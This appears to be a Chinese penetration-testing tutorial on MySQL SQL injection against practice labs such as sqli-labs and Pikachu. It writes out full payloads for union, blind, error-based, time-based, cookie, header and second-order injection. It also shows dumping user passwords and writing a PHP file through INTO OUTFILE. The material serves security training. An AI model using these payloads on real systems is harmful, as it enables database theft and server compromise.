渗透测试-sql注入-mysql注入
1.SQL注入基础:SQL:数据库查询与程序设计语言,用于存储数据,查询,更新,插入,管理数据库。
SQL注入:攻击者通过构造特殊的SQL语句,入侵目标系统,致使数据库中的数据泄露。
注入存在需要满足两个条件:1.存在数据库交互:正确或错误的显示在web页面上。2.参数(?id)用户可控
SQL注入可以干什么?1.查询数据 2.读写文件 3.执行命令
影响:用户信息泄露
2.Mysql数据库结构
数据库A
表
列
字段
information_schmema 这个数据库会记载所有信息,mysql5.0以上都会自带这个数据库。
数据库名:Database()
版本:version()
用户:user()
Information_schema.tables 记录表名的表
Information_schema.columns 记录列名信息的表
Table_name 表名
Column_name 列名
Group_concat() 表示整个查询
3.数字型注入
步骤:
1、order by 1 正常 order by 1000错误 -->存在交互,会报错 2、order by 2 3 .. order by 3正常 order by 4错误 3、Union select 1,2,3 爆出显示数字的位置 4、获取数据库,用户权限,MySQL版本信息查询指定数据库下的表,并分析可能储存有管理员账号密码信息的表。 5、获取指定表名下的列名 6、获取指定列名下的字段 7、MD5解密 8、找到后台,进入后台,寻找文件上传等漏洞getshell
解决方法:1.加 ' 2.加and1=2
演示:
第一步:判断数据库长度为3,爆出显位。
第二步:爆出数据库名称和用户权限
第三步:爆出指定数据库的表名,并思考哪个表可能会存放管理员账户密码。
第四步:爆出指定表的列名
第五步:爆出指定列的字段信息(账户名/密码)
4.字符型注入
如何判断是数字型注入还是字符型注入?
Where id = 1 数字型
Where id =”1” 字符型
Where id = ‘1’ 字符型
判断:输入 and 1=2 不报错,说明是字符型。
数据库源码:
判断闭合条件:
最外面一层引号不用管,这是作为一条sql语句自带的,1'是我们自己输入的,由一对单引号给引起来,作为字符型语句。LIMIT 0,1表示逐行读取。当后面有干扰符号时,使用%23 --+ 注释掉 ,%23-- 注释 +是空格。
如果是双引号括号组合:单引号 and 1=2不报错
去掉最外一层单引号,1''是我们自己输入的语句,剩下一个双引号和后面一个括号,所以可以判断双引号前面也需要一个括号。我们需要去闭合语句,才能进行注入。
通过报错语句推测:(“1”)--+”)
首先需要让数据库报错:是因为我们需要知道数据库是否跟我产生交互。
不让数据库报错:因为我们需要让数据库执行我们构造的SQL语句。
为什么数据库报错:SQL语句有错。
判断为字符型注入以后,构造闭合之后的步骤和数字型一样。
5.盲注
普通注入:会直接爆出信息
盲注:需要通过一些变化(逐字拆解)来判断出我们猜的信息对不对。
分类:①布尔型:基于页面显示的正常或错误
正常页面:
加',判断存在sql注入:
界面只存在两种状态:You are in (正常) 什么都没有(错误)
当什么信息都无法获取时(没有爆出可显位置),尝试盲注,很多工具都是采用盲注。
情况:1.sql语句出现错误,闭合+注释 2.>100也不报错 加-1
盲注步骤:
-
获取数据库长度,or length(database())>1,报错,尝试加注释。
-
加注释后显示正常,说明该系统存在盲注漏洞。
-
把长度设置为100,看数据库是否报错,这里显示没有报错,说明语句存在问题。
-
设置-1,让数据库报错。
采用二分法判断数据库长度:
知道位数有什么用:简化工作量。判断表,列,字段长度也可以采用二分法,可以节省跑字典时间。
ASCII码:用python chr()函数,直接解码数字,也可以自己写个小脚本一次计算多个数字的ASCII码。ASCII码字母大小写不一样。
采用ASCII码注入:
1.猜出第一个字母是s,第一个1表示第一个字母,第二个1不用管。substr()函数是字符截取函数。
http://192.168.72.130:86/Less-5/?id=-1' or(select substr(database(),1,1)='s') --+
2.猜第二个字母是s,数据库显示报错。
局限性:这里面你不光要猜26个英文字母还要猜10个数字 u1s1。如果把英文字母转成ASCII码,就全是数字,节省了猜词的时间。注意:这里数字(115)不需要用括号括起来。
不用猜数据库的方法:直接用database()代替数据库名。
采用burpsuite快速拆解:1.设置,注意两个变量都要设置。
2.通过长度判断,点一下Length,按顺序排列。1-8位就是我们需要的ASCII码(因为之前通过手工注入已经判断该数据库长度为8)。
3.改变http请求。
4.调节线程,让字典跑的快一点,1000是上限。
5.判断是否爆破成功。
6.解ASCII码。
7.猜表、列、字段。
联合查询:1.Union select table_name from information_schema.tables where table_schema='security'
2.Union select column_name from information_schema.columns where table_name='users'
3.Union select (group_concat(passsword))from security.users 猜解表名:http://192.168.72.130:86/Less-5/?id=-1' or(select group_concat(ascii(substr(table_name,1,1)) from information_schema.tables where table_schema='security' limit 0,1)) =100 --+ 猜解列名:http://192.168.72.130:86/Less-5/?id=-1' or(select group_concat(ascii(substr(column_name,1,1)) from information_schema.columns where table_name='users'limit 0,1) )=100 --+ 猜解字段:http://192.168.72.130:86/Less-5/?id=-1' or(select ascii(substr(password,1,1)) from security.users limit 0,1)) =68 --+Limit 0,1
逐行读取,为什么要加limit 0,1 ?为什么猜数据库名的时候不需要:当前网站数据库肯定连接的一个数据库,但表有很多,我们需要告知数据库我们查询哪一个表。 8.用BurpSuite跑字典爆破:
-
先抓包,再改包,也可以在之前的包的基础上修改
-
设置变量
-
爆破表名,如果找的不是用户名密码所在的表,可以改变爆破的表格。
-
爆破列名:...
-
爆破字段:...
②显错注入/报错注入
当页面不会输出和数据库有关的参数时,这个时候就需要用到函数UpdateXml (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc;
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程;
第三个参数:new_value,String格式,替换查找到的符合条件的数据。
Payload:http://192.168.72.130:86/Less-5/?id=1' and updatexml(1,concat(0x7e,database()),1) --+ http://192.168.72.130:86/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+ http://192.168.72.130:86/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) --+ http://192.168.72.130:86/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(password) from security.users )),1) --+
当系统有安全狗,不让你查数据库的时候,数据库换成database(),查表直接查users。③基于时间延迟的盲注
1.判断是否存在基于时间延迟的盲注,输入’and sleep(5) 页面处于一直加载的状态,直到第五秒才加载完成说明存在。
2.判断数据库长度:and if(length(database())=7,sleep(5),sleep(1)) --+ 条件成立执行第二个,不成立执行第三个。依然可以采用之前判断数据库长度的方法。
3.获取具体信息:
获取数据库名:
' and if(ascii(substr(database(),1,1))=114,sleep(20),sleep(1)) --+
获取表名:
' and if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema='security' limit 0,1)=114,sleep(20),sleep(1)) --+
获取字段:...
6.提交方式注入
①POST注入
场景:登录框,一般为字符串,不是数字型,需要考虑闭合问题。
①先开burpsuite抓包,然后在登录框输入信息,再查看抓到的报文。
②修改报文提交信息,加单引号,查看响应报文,如果响应报文报错,证明有漏洞存在。
③修改提交语句,让响应报文不报错。order by 1不报错,order by 100报错,证明语句没问题。
④接下来就是正常流程,爆显位,爆数据库,爆表,爆列,爆字段。
②cookie注入
场景:网站开发人员光过滤GET、POST提交,忽略了cookie
$_GET $_POST $_COOKIE $_REQUEST(全部接受)
分两种情况:1.目标网站有cookie。
2.目标网站没有cookie,这种情况我们可以硬写一个cookie。
①正常登录网站
②抓包
③注入,在cookie字段加',响应包报错,说明存在cookie注入。
④order by 1正常,order by 100报错,说明语句没问题。
⑤order by x猜数据库长度,这里为3。然后开始爆显位。
⑥没有爆出显位,加'和and 1=2,爆出显位。也可以在admin前面加-1。
⑦接下来就是正常走流程,爆数据库,爆表,爆列,爆字段。
7.二次注入
环境配置:1.SQLi-labs安装
https://github.com/Audi-1/sqli-labs
2.修改配置文件:sqli-labs-master\sql-connections\db-creds.inc
二次注入原理:mysql_real_escape_string 前端被过滤,安全,无法注入。
二次查询的过程中没有过滤导致注入。
分类:①任意用户密码修改
Update users set password where username='admin’
Update users set password where username='admin'#’在注册账户的过程中,admin'#被转义了,所以可以生成admin'#账户,但是在更新密码的过程中,#'被一对单引号闭合了,没有任何作用,所以导致修改admin'#的密码,系统执行的是修改admin的密码。$username=admin'# 更新密码没有过滤,可注入。
注入前:
修改admin'#的密码:
admin'#的密码没有被修改,admin的密码修改成了123456:
②留言板注入
靶场:http://47.240.40.250:6003/main.php(按月付费)
1.判断注入点:正常的返回,输入2,返回2。每次提交需要重新返回页面才能看见结果。
2.通过三个’确定出现问题的地方:类型。
原理: $sql="insert into post Set cate='222', Message='$message', B_id='$id'; 修改数据库语句:"$sql="insert into post Set cate='222',message=user()/*', Message='$message', B_id='$id'; ”*/#’ /* */为注释,这里不能用--或者#注释,因为在user()后面加--或者#只会注释掉后面的'号,下面的Message还是会覆盖前面的message。#号用来注释后面的'号,让user()后面的'起作用。
具体步骤:
1.构造注入查询语句,提交,返回。
2.闭合
3.查数据库名:1',message=database(),/*
4.查列名:
1',message=(select group_concat(column_name) from information_schema.tables where table_name='users'),/*
5.查字段:
1',message=(select password from users where id=1),/*
注意:用之前查字段构造式不好使的时候使用id,步骤3、4、5都需要闭合。
8.head头注入:又叫http头注入,是报错注入的延伸和扩展。包括:user-agent、refer、xff三种。靶场环境:掌控安全学院SQL注入。
为什么会存在注入:当用户成功登录的时候,为了方便用户查看上次登录的到底是不是自己,采取的一种安全措施。记录在数据库的过程中就可能会存在注入。
靶场核心代码分析:
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_USER_AGENT'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO uagent (`uagent`,`username`) VALUES ('$uagent','$uname')";//满足SQL注入条件:存在与数据库的交互,且无过滤。
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';
开burpsuite抓包改包:
注入方法:直接把user-agent后面内容删掉重写,不过需要注意两个问题:
1.user-agent后面一定要有一个空格
2.闭合问题
注入步骤:
1.在user-agent后面加一个',响应报文报错,说明用户可控。
2.构造payload,这里使用的"~"和之前的ASCII码0x7E是一个原理。这里构造语句失败。
3.查看源代码,找失败原因。
因为我们在payload中加入了--+,把源数据库后面的括号给注释掉了,造成了语句没有闭合,所以报错了。
4.把缺失的括号加进去,让语句闭合。响应报文还是报错。
5.把--+换成#,没有报错。爆出了数据库名,账户,密码。
其他字段原理相同,refer(实际应用中比较少),x_forward_for字段如果报文中没有,可以自己写一个。
深入(注意赋值的个数,黑盒测试只能逐一测试)
当查询表名时候提示:
Column count doesn't match value count at row 1
百度后调整语句,MySQL不报错,但是没有显示出信息。
把and换成or,和limit 0,1无关:
'or updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='head_error' limit 0,1)),1),1) #
9.高权限写入文件
漏洞练习平台:Pikachu。
步骤:①构造语句,闭合,判断数据库长度。
②爆显位,这里两个显位都可以用。
③判断数据库权限为root。
④写入文件(这里生成路径要用绝对路径,执行写入命令后,会在对应目录生成test.php文件,位于根目录之下。)
http://127.0.0.1/pkc/vul/sqli/sqli_str.php?name=' union select 1,'<?php phpinfo ?>' into outfile 'c:\\phpstudy\\www\\pkc\\test.php' --+&submit=æ¥è¯¢
⑤用小葵将 <?php phpinfo() ?> 转码
⑥生成tep.php后就可以直接访问。
网站路径如何获取?、
1.报错显示
2.谷歌黑客 Inurl:warning
3.读取配置文件(著名CMS可适用)
4.漏洞报错
5.遗留文件:phpinfo
6.字典猜解
*注意事项:路径的写法:要么/ 要么就两个\\
10.高权限跨库注入:
条件:root权限:user()
A无注入点,B存在MySQL注入 A,B都在同一个MySQL数据库当中。
步骤:①确定数据库长度。
②再爆出显位。
③爆出全部数据库,这里不能用database()代替(很重要)
④选哪个数据库就爆哪个数据库的表。
⑤爆列。
⑥爆字段。
未完待续——参数类型注入、加解密注入、魔术引号。
